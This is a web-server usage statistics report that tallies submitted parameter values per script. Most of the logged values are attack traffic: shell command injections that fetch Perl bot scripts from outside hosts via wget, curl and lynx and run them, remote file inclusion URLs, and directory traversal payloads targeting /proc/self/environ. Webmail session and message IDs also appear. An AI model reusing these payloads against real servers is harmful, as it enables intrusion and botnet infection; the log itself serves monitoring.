cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	7
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	5
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	5
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	5
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f etch http://71.41.190.203/subale.txt;lwp-download http://71. 41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r f *.txt	4
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	4
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2 a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp- download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167. 23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	4
Parameter	list
Value	Accesses
1	9
Parameter	path5Bdocroot5D
Value	Accesses
http://www.xfactor.altervista.org/php5/id.txt???	2
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	39
http://usuarios.arnet.com.ar/adipasqua/http?	26
http://www.rayzorowns.kit.net/id.txt???	22
http://www.neoncomanda.kit.net/tool25.dat?	18
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	16
http://www.jungo8949.co.kr/tool25.txt?	16
http://claroline.lct-net.cl/id?	16
http://ownsirc.googlepages.com/botnet.txt?	13
http://h1.ripway.com/DiegoVirus/pbot.txt?	10
http://www.freewebs.com/yahwek/phpbot.txt?	9
Parameter	path[docroot]http://usuarios.arnet.com.ar/adrikrasnow/rfi/bl a.txt?
Value	Accesses
	2
OTHER:	1,144
Script	Total Accesses
/wusage/summary/cgi.html/help.php	1,291
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	8
uname -a; id	6
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP /spriter1.txt;perl spriter1.txt	3
cd /tmp;wget http://mensagenss.hospedagemdesite.com/bot/bot_ ao.txt;curl -O -f http://mensagenss.hospedagemdesite.com/bot /bot_ao.txt;lynx -source http://mensagenss.hospedagemdesite. com/bot/bot_ao.txt;lwp-rget http://mensagenss.hospedagemdesi te.com/bot/bot_ao.txt;fetch http://mensagenss.hospedagemdesi te.com/bot/bot_ao.txt;perl bot_ao.txt;rm -rf bot_ao.txt	3
id	2
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1. txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i p1.txt;perl ros1.txt;perl scanasc.txt	2
Parameter	css_path
Value	Accesses
http://invisionar.hostinggratisargentina.com/eth0?	47
http://ownsirc.googlepages.com/botnet.txt?	38
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	23
http://208.74.174.183/brizola.txt?	20
http://www.oslutadores.com/?id=23530	18
http://normanzito.iespana.es/http.txt??	15
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt?	13
http://ownsparaficar.googlepages.com/funfo.txt?	13
http://204.11.228.115/id.txt?	11
http://overowns.googlepages.com/testera.txt?	11
Parameter	list
Value	Accesses
1	9
OTHER:	1,033
Script	Total Accesses
/wusage/monthly/2011/05/01/	1,275
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	36
125	14
Parameter	amp;option
Value	Accesses
com_gcalendar	14
Parameter	amp;view
Value	Accesses
gcalendar//?option=com_gcalendar	35
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	175
../../../../../../../../../../../../../../../proc/self/envir on	94
..//..//..//..//..//..//..//..///proc/self/environ 00	63
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	56
../../../../../../../../../../..//proc/self/environ 00	47
../../../../../../../../../../..//proc/self/environ 00	25
..//..//..//..//..//..//..//..///proc/self/environ	13
../../../../../../../../../../../../../../..//proc/self/envi ron 00	12
../../../../../../../../../../../../..//proc/self/environ 00	12
../../../../../../../../../../../../../../..//proc/self/envi ron	6
Parameter	index.php?option
Value	Accesses
com_google	2
Parameter	index2.php?option
Value	Accesses
com_gcalendar	1
Parameter	option
Value	Accesses
com_google	401
com_gcalendar	36
com_myblog	36
com_jscalendar	33
com_juser	18
com_product	16
com_ccnewsletter	14
com_rokdownloads	13
com_fabrik	10
com_goole	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	29
../../../../../../../../../../../../../../../proc/self/envir on	7
Parameter	view
Value	Accesses
../../../../../../../../../../../../../../../proc/self/envir on	18
../../../../../../../../../../../../..//proc/self/environ 00	12
../../../../../../../../../../../../../../..//proc/self/envi ron 00	10
OTHER:	16
Script	Total Accesses
/cgi-bin/plugins/neomail/neomail.pl	1,254
Parameters by Submitted Value
Parameter	action
Value	Accesses
readmessage	114
displayheaders	40
composemessage	27
logout	6
emptytrash	4
Parameter	composetype
Value	Accesses
forward	13
reply	8
replyall	3
Parameter	custompage
Value	Accesses
3	5
2	1
Parameter	firstmessage
Value	Accesses
1	167
31	10
61	3
60	1
121	1
151	1
30	1
91	1
Parameter	folder
Value	Accesses
INBOX	160
	14
SAVED	9
TRASH	7
SENT	1
Parameter	headers
Value	Accesses
simple	57
Parameter	message_id
Value	Accesses
cc70a53a6ce846358350235dbdad5786	12
75f33a8c1ed1d9837be353ffe9017350	8
80500558a81fd9a79fca114b0fe48b66	5
a5bfc665bf76143d65e79d8a1b422a54	4
bb4999647043470ec4986b7829a974fc	4
62d14cc55d03d8cac3a1bb164a24da1c	4
cd30f16cac3ff83a1c7b5bfa52ff295e	3
f828f9212b98f2b7bd2625cf2f920ea0	3
1b64b6edf9ca94cc3d8dae3636f2fd32	3
870a4d5e068b0df113612361bf4db405	3
Parameter	sessionid
Value	Accesses
mickey-session-0.496305458554165	53
mickey-session-0.768175121936114	17
mickey-session-0.403925060368241	17
killianey-session-0.0750747035062922	15
mickey-session-0.141304360077815	15
mickey-session-0.860474512753175	10
mickey-session-0.688039203946577	10
mickey-session-0.445742682161839	9
mickey-session-0.293016888274909	7
mickey-session-0.669192745656805	7
Parameter	sort
Value	Accesses
date	141
sender	28
subject	22
Parameter	status
Value	Accesses
	37
RO	12
R	7
U	1
OTHER:	143
Script	Total Accesses
/wusage/summary/cgi.html/display.php	1,223
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	14
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	12
uname -a; id	9
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	4
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	4
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	3
id	3
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	2
cd /tmp;rm andre.txt;wget http://theowns-host.we.bs/files/an dre.txt;fetch http://theowns-host.we.bs/files/andre.txt;lwp- download http://theowns-host.we.bs/files/andre.txt;curl -O h ttp://theowns-host.we.bs/files/andre.txt;lynx http://theowns -host.we.bs/files/andre.txt;perl andre.txt	2
Parameter	list
Value	Accesses
1	1
Parameter	pag
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	26
	19
http://www.tudoprosperar.kit.net/x.txt?	18
http://www.pucorp.t5.com.br/lp.txt?	18
http://189.23.251.131/~tiago/new.txt?	17
http://www.capsoir.com/images/TRA.txt?	16
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	15
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	15
http://ownsparaficar.googlepages.com/funfo.txt?	14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	12
OTHER:	993
Script	Total Accesses
/wusage/weekly/2011/04/03/	1,200
Parameters by Submitted Value
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	206
../../../../../../../../../../../../../../../proc/self/envir on	89
..//..//..//..//..//..//..//..///proc/self/environ	80
..//..//..//..//..//..//..//..///proc/self/environ 00	53
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	50
../../../../../../../../../../..//proc/self/environ 00	35
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	27
../../../../../../../../../../../../../../..//proc/self/envi ron	20
..//..//..//..//..//..//..//..//..//..//..//..//proc/self/en viron	2
../../../../../../../../../../../../..//proc/self/environ 00	1
Parameter	option
Value	Accesses
com_google	496
com_fabrik	64
com_jscalendar	37
com_ccnewsletter	3
Parameter	view
Value	Accesses
../../../../../../../../../../../../../../../proc/self/envir on	26
../../../../../../../../../../../../../../..//proc/self/envi ron 00	11
OTHER:	0
Script	Total Accesses
/wusage/summary/cgi.html//skin/zero_vote/ask_password.php	1,179
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp -download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt	1
Parameter	dir
Value	Accesses
http://www.mta.cl/galeria2/galery.txt?	82
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt? ?	44
http://www.vsm.gov.tr/pwnd/safe.gif?	32
http://www.ar-vision.com/galery.txt?	22
http://www.burhanukum.com/images/galery.txt?	19
http://x.apescar.net/r1.jpg??	19
http://www.gumgangfarm.com/shop/data/id.txt?	16
http://www.seventhtavern.com/images/id.txt?	15
http://normanzito.iespana.es/http.txt??	14
http://www.mta.cl/galeria2/galery.txt???	14
OTHER:	901
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/faqsupport/include.php	1,108
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	9
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
uname -a; id	5
cd /tmp;wget http://spamroxx.iespana.es/atkbotnet.txt;perl a tkbotnet.txt	5
cd /tmp;rm bn.txt;wget http://nofxd.110mb.com/bot.txt;fetch http://nofxd.110mb.com/bot.txt;lwp-download http://nofxd.110 mb.com/bot.txt;curl -O http://nofxd.110mb.com/bot.txt;lynx h ttp://nofxd.110mb.com/bot.txt;perl bot.txt	5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	4
cd /tmp;wget http://www.iradex.kit.net/spk/spk.txt;curl -O h ttp://www.iradex.kit.net/spk/spk.txt;lwp-download -a http:// www.iradex.kit.net/spk/spk.txt;GET http://www.iradex.kit.net /spk/spk.txt;lynx -source http://www.iradex.kit.net/spk/spk. txt;links -source http://www.iradex.kit.net/spk/spk.txt;perl spk.txt;rm -rf spk.txt;rm -rf spk001.txt	3
cd /tmp;rm enviar.txt;wget http://br.geocities.com/svconts/e nviar.txt;fetch http://br.geocities.com/svconts/enviar.txt;l wp-download http://br.geocities.com/svconts/enviar.txt;curl -O http://br.geocities.com/svconts/enviar.txt;lynx http://br .geocities.com/svconts/enviar.txt;perl enviar.txt	3
id	3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	3
Parameter	list
Value	Accesses
1	4
Parameter	path[docroot]
Value	Accesses
http://invisionar.hostinggratisargentina.com/eth0?	43
http://www.jungo8949.co.kr/tool25.txt?	21
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	16
http://ownsirc.googlepages.com/botnet.txt?	13
http://bgeunivers.free.fr/modules/AllMyGuests/tool25.dat?	12
http://www.neoncomanda.kit.net/tool25.dat?	12
	12
http://freewebs.com/tow1337/x.txt?	11
http://zuwill.110mb.com/BotneT.txt?	10
http://www.cosmick.kit.net/ty.txt?	10
OTHER:	898
Script	Total Accesses
/wusage/summary///	1,090
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://jvo.dk/fuursaml/TNG//gedcom_folder/babid.txt???	3
Parameter	DIR_PREFIX
Value	Accesses
http://www.lazar.ru/manager/processors/copyright.txt? ??	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.corretoresdeseguros.com.br/estatisticas/id1???	3
Parameter	GLOBALS
Value	Accesses
	5
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1???	2
http://www.c21vox.tv/id1.txt??	1
http://nic.bupt.edu.cn/media/j1.txt??	1
http://surya1.fileave.com/id.txt??	1
Parameter	Itemid
Value	Accesses
12	1
	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.kyokushin.hu/fx29id2.txt???	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://www.howtolisten.kr/sarangbi_bgm/id1.txt?	8
http://phamsight.com/docs/images/head??	8
http://www.whinercentral.com/modules/Neos_Chronos/modules/ad min/mawar.txt??????	6
http://www.howtolisten.kr/lct/lib/list/respon1.txt?	5
http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt???	2
http://indah2.webs.com/fx29id1.txt???	1
http://stemandstein.com//poll/id11.txt??	1
test??	1
http://www.babyu.co.kr/babyubbs/id1.txt?	1
http://kkc.or.kr/upload/banner/ipays.jpg??	1
Parameter	_REQUEST
Value	Accesses
	5
Parameter	_REQUEST[Itemid]
Value	Accesses
1	5
OTHER:	1,026
Script	Total Accesses
/wusage/weekly/2010/11/07/	1,087
Parameters by Submitted Value
Parameter	Option
Value	Accesses
com_google	2
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	2
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	142
..//..//..//..//..//..//..//..///proc/self/environ 00	108
../../../../../../../../../../../../../../../proc/self/envir on	88
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	51
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	40
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	40
../../../../../../../../../../../../../../..//proc/self/envi ron	22
../../../../../../../../../../..//proc/self/environ 00	21
//..//..//..//..//..//..//..//..///proc/self/environ 00	7
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// ..//..//..//..//..//..//..//..//..///proc/self/environ 00	6
Parameter	option
Value	Accesses
com_google	523
com_rwcards	7
com_fabrik	5
com_goole	2
com_projects	1
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../../../../../../../../../../../../..//proc/self/envir on 00	1
Parameter	view
Value	Accesses
rwcards	6
..//..//..//..//..//..//..//..///proc/self/environ 00	6
OTHER:	7
Script	Total Accesses
/wusage/weekly/2011/02/06/	1,032
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	32
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	120
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	90
..//..//..//..//..//..//..//..///proc/self/environ 00	79
../../../../../../../../../../../../../../../proc/self/envir on	55
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	39
../../../../../../../../../../..//proc/self/environ 00	28
../../../../../../../../../../..//proc/self/environ 00	23
../../../../../../../../../../../../../../..//proc/self/envi ron	16
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	13
..//..//..//..//..//..//..//..//..//..//..//..//..//..//../p roc/self/environ	3
Parameter	option
Value	Accesses
com_google	403
com_rokdownloads	38
com_myblog	32
com_rwcards	18
com_myfiles	6
com_gcalendar	3
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	16
../../../../../../../../../../../../..//proc/self/environ 00	5
..//..//..//..//..//..//..//..///proc/self/environ 00	5
../../../../../../../../../../../../../../../proc/self/envir on	4
../../../../../../../../../../../../../../..//proc/self/envi ron 00	2
OTHER:	2
Script	Total Accesses
/wusage/summary/cgi.html//samplenewsletter.php	1,019
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	4
uname -a; id	4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	4
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f etch http://71.41.190.203/subale.txt;lwp-download http://71. 41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r f *.txt	4
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	4
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	3
cd /tmp;rm -rf tut;wget http://inimigo.t35.com/tut.txt;lwp- download http://inimigo.t35.com/tut.txt;fetch http://inimigo .t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut. txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf tut.txt	3
Parameter	list
Value	Accesses
1	9
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	37
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	28
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	17
http://usuarios.arnet.com.ar/larry123/ka.txt?	16
http://www.jungo8949.co.kr/tool25.txt?	12
http://h1.ripway.com/DiegoVirus/pbot.txt?	12
http://www.neoncomanda.kit.net/tool25.dat?	11
http://ownsirc.googlepages.com/botnet.txt?	11
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt ?	10
http://www.freewebs.com/yahwek/phpbot.txt?	9
OTHER:	793
Script	Total Accesses
/wusage/summary/cgi.html//faqsupport/samplefaqsupport.php	1,012
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	12
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	10
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	7
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
uname -a; id	5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	4
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	4
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
Parameter	list
Value	Accesses
1	1
Parameter	path
Value	Accesses
http://www.mta.cl/galeria2/galery.txt?	1
Parameter	path[docroot]
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	44
http://www.cosmick.kit.net/ty.txt?	24
http://www.capsoir.com/images/TRA.txt?	22
http://www.neoncomanda.kit.net/tool25.dat?	16
http://proxysx.t35.com/x0.txt?	14
http://www.pucorp.t5.com.br/lp.txt?	14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	12
http://aszer.republika.pl/cos..txt?	12
http://aszer.republika.pl/cos1..txt?	10
	10
Parameter	path[docroot]http://phoenixgc.net/sikat?
Value	Accesses
	2
OTHER:	769
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
